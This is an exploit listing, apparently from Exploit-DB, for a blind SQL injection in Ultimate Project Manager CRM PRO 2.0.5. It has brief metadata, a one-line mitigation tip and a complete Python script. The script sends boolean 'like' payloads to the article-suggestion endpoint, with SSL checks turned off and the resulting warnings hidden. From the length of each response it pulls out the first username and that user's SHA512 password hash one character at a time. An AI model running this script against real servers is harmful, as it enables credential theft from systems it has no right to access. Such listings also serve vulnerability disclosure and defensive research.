Ultimate Project Manager CRM PRO 2.0.5 - SQLi Credentials Leakage

vendor:

Ultimate Project Manager CRM PRO

by:

nag0mez

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Ultimate Project Manager CRM PRO

Affected Version From: 2.0.5

Affected Version To: 2.0.5

Patch Exists: NO

Related CWE: N/A

CPE: 2.0.5

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Kali Linux 2020.2

2020

Ultimate Project Manager CRM PRO 2.0.5 – SQLi Credentials Leakage

The SQLi injection does not allow UNION payloads. However, we can guess usernames and passwords fuzzing the database. A Python script was used to send payloads to the server and guess usernames and passwords. The lack of verification results in a warning message from Python. To get a clean output, all warnings were ignored.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: Ultimate Project Manager CRM PRO 2.0.5 - SQLi Credentials Leakage
# Date: 2020-16-09
# Exploit Author: nag0mez
# Vendor Homepage: https://ultimatepro.codexcube.com/
# Version: <= 2.0.5
# Tested on: Kali Linux 2020.2


# The SQLi injection does not allow UNION payloads. However, we can guess usernames and passwords fuzzing the database.

#!/usr/bin/env python3
#-*- coding: utf-8 -*-
import requests
import sys

# The original vulnerability was found on a server with an invalid SSL certificate,
# which Python could not verify. I added the verify=False parameter to avoid SSL check.
# The lack of verification results in a warning message from Python.
# To get a clean output, we will ignore all warnings.
import warnings
warnings.filterwarnings("ignore")

host = 'https://testurl.test' # Change
url = "{}/frontend/get_article_suggestion/".format(host)

chars = '1234567890abcdefghijklmnopqrstuvwxyz'
hex_chars = 'abcdef1234567890'

def send_payload(payload):
	try:
		response = requests.post(url, data=payload, verify=False)
		content = response.text
		length = len(content)
		return length
	except Exception as e:
		print('Cannot connect to host. Exit.')
		sys.exit(1)
	

def get_first_user():
	found = True
	known = ''

	while found:

		found = False
		for c in chars:
			test = known + c
			payload = {'search': "' or (select username from tbl_users limit 1)like'{}%'-- ".format(test)}
			length = send_payload(payload)

			if length > 2:
				found = True
				known += c
				print(c, end='')
				sys.stdout.flush()
				break

	return known

def get_hash(username):
	found = True
	known = ''

	while found:

		found = False
		for c in hex_chars:
			test = known + c
			payload = {'search': "' or (select password from tbl_users where username='{}' limit 1)like'{}%'-- ".format(username,test)}
			length = send_payload(payload)

			if length > 2:
				found = True
				known += c
				print(c, end='')
				sys.stdout.flush()
				break

	return known


if __name__ == '__main__':
	print('Exploit started.')
	print('Guessing username...')

	username = get_first_user()

	if username != '':
		print('\nUsername found: {}'.format(username))
	else:
		print('\nCould not get username! Exit.')
		sys.exit(1)

	print('Guessing password SHA512 hash...')

	sha = get_hash(username)

	if sha != '':
		print('\nHash found: {}'.format(sha))
	else:
		print('\nCould not get Hash! Exit.')
		sys.exit(1)